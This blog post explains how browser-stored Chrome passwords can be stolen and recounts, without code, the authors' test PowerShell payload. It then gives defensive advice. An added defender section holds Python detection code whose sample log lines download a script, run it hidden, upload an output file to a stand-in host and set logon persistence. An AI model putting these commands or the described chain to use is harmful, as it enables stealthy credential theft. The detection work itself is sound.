Popular browsers like Google Chrome offer a convenient way to “securely” store your passwords. But they are not as secure as you might hope, and can leave you open to simple exploits that steal data right out of your browser’s storage system.

The problem is that many browsers (Chrome is the example we use here) encrypt the passwords with the operating system’s built-in encryption technology. This is ideal for some forms of data to which programs need access. However, for your personal passwords stored in your browser, it’s bad news. You see, any program that can run “as you” in the operating system can get access to this data. To demonstrate this, we actually wrote our own piece of malware to make this happen.

The Quiet PowerShell Password Thief

Windows PowerShell is a shell initially developed by Microsoft for the purposes of task automation and configuration management. It’s a very powerful tool that system administrators use to automate important tasks to keep your machine running. However, it can also be used for nefarious purposes. Many of the commands available in PowerShell that are very useful can also be used to do malicious things like download malware.

In this case, we used an open source tool that decrypts your Chrome passwords in just 37 lines of code. We then wrote a little code of our own that could silently run in the background and:

  • Download the Chrome Password Decryptor;
  • Run it;
  • Save the results to a file;
  • Upload the results to our test “attacker” server;
  • Add a persistence mechanism to ensure that this process repeats itself every time you log in to your computer, so we always have your latest passwords.

Using other advanced techniques to deliver malware, an attacker could deliver this malware to you quietly and begin collecting your sensitive account information. We tested our payload across multiple different antivirus systems and none of them picked it up. In fact, it didn’t get caught until our colleagues at Huntress Labs alerted us to its presence.
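
A defender's view of the chain listed above, as an added example that is not from the original article: Python code that correlates those stages per host and user from PowerShell script block logs (Event ID 4104). The pipe-delimited record format, the regexes and the sample lines are constructed assumptions, not output from the payload described here.

```python
import re
from collections import defaultdict

# Heuristic patterns (assumptions, tune for your environment), one per stage
# of the chain described above. Upload is checked before download because
# both stages use the same web cmdlets.
UPLOAD = re.compile(r"-Method\s+Post|-InFile\b|UploadFile|UploadString", re.I)
DOWNLOAD = re.compile(r"Invoke-WebRequest|Invoke-RestMethod|DownloadFile|DownloadString|Start-BitsTransfer", re.I)
PERSIST = re.compile(r"Register-ScheduledTask|schtasks(\.exe)?\s+/create|CurrentVersion\\Run\b", re.I)
HIDDEN = re.compile(r"-W(indowStyle)?\s+Hidden", re.I)

def stages_in(script):
    """Return the set of chain stages a single script block exhibits."""
    found = set()
    if UPLOAD.search(script):
        found.add("upload")
    elif DOWNLOAD.search(script):
        found.add("download")
    if PERSIST.search(script):
        found.add("persistence")
    if HIDDEN.search(script):
        found.add("hidden_exec")
    return found

def correlate(log_text, threshold=3):
    """Group events by (host, user); report accounts showing >= threshold stages."""
    seen = defaultdict(set)
    for line in log_text.strip().splitlines():
        parts = line.split("|", 3)
        if len(parts) != 4:
            continue  # skip malformed records instead of crashing
        _ts, host, user, script = parts
        seen[(host, user)] |= stages_in(script)
    return {k: sorted(v) for k, v in seen.items() if len(v) >= threshold}

# Constructed sample records: timestamp|host|user|script block text
SAMPLE = r"""
2024-01-01T09:00:01|WS01|alice|Invoke-WebRequest -Uri https://example.invalid/tool.ps1 -OutFile $env:TEMP\t.ps1
2024-01-01T09:00:03|WS01|alice|powershell.exe -WindowStyle Hidden -File $env:TEMP\t.ps1
2024-01-01T09:00:09|WS01|alice|Invoke-RestMethod -Uri https://example.invalid/in -Method Post -InFile $env:TEMP\out.txt
2024-01-01T09:00:10|WS01|alice|Register-ScheduledTask -TaskName Updater -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Action $a
2024-01-01T10:15:00|WS02|bob|Invoke-WebRequest -Uri https://example.invalid/setup.msi -OutFile C:\Temp\setup.msi
"""

if __name__ == "__main__":
    for (host, user), stages in correlate(SAMPLE).items():
        print("ALERT", host, user, stages)
```

A single download, like the WS02 record, stays below the threshold; the alert fires only when one account shows several stages of the chain together.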

What does this mean?

Put simply, we successfully created a payload that steals your Google Chrome saved passwords every time you log in to your computer, and we did so without being detected by some of the most advanced antivirus platforms in the world.

How do I protect myself?

Step 1. Get a New Password Manager

We like Bitwarden, as it’s free and easy to use. The premium version unlocks a little more, but the free edition typically works for the average user.

Step 2. Remove Your Passwords from Google Chrome

Follow this guide from Google on removing stored passwords in Chrome.

Step 3. Enable two-factor authentication everywhere you can!

We get it, it’s kind of a pain to enter both a password and your “onetime secret.” However, two-factor authentication is critical to protecting you from password theft. There are physical options for two-factor now that support some accounts, such as the Yubico YubiKey that works with Google, Facebook, and some other providers who are catching up.

Bonus Protections

There are other good security practices you should be following:

  • Unique Passwords
    Using the same password for your Facebook and bank account is just a bad idea. If your Facebook account is compromised, so too is your bank account. That’s not good! Your new password manager should allow you to generate unique passwords for each login you create.
  • Strong Passwords
    Weak passwords are a pointless epidemic. Use strong passwords that are hard for people to crack. A password manager makes this much easier to accomplish. Be sure to use a strong master password and two-factor authentication for your password manager. I like to use passphrases like “Opacity.twentieth.saggy.v1ce!”.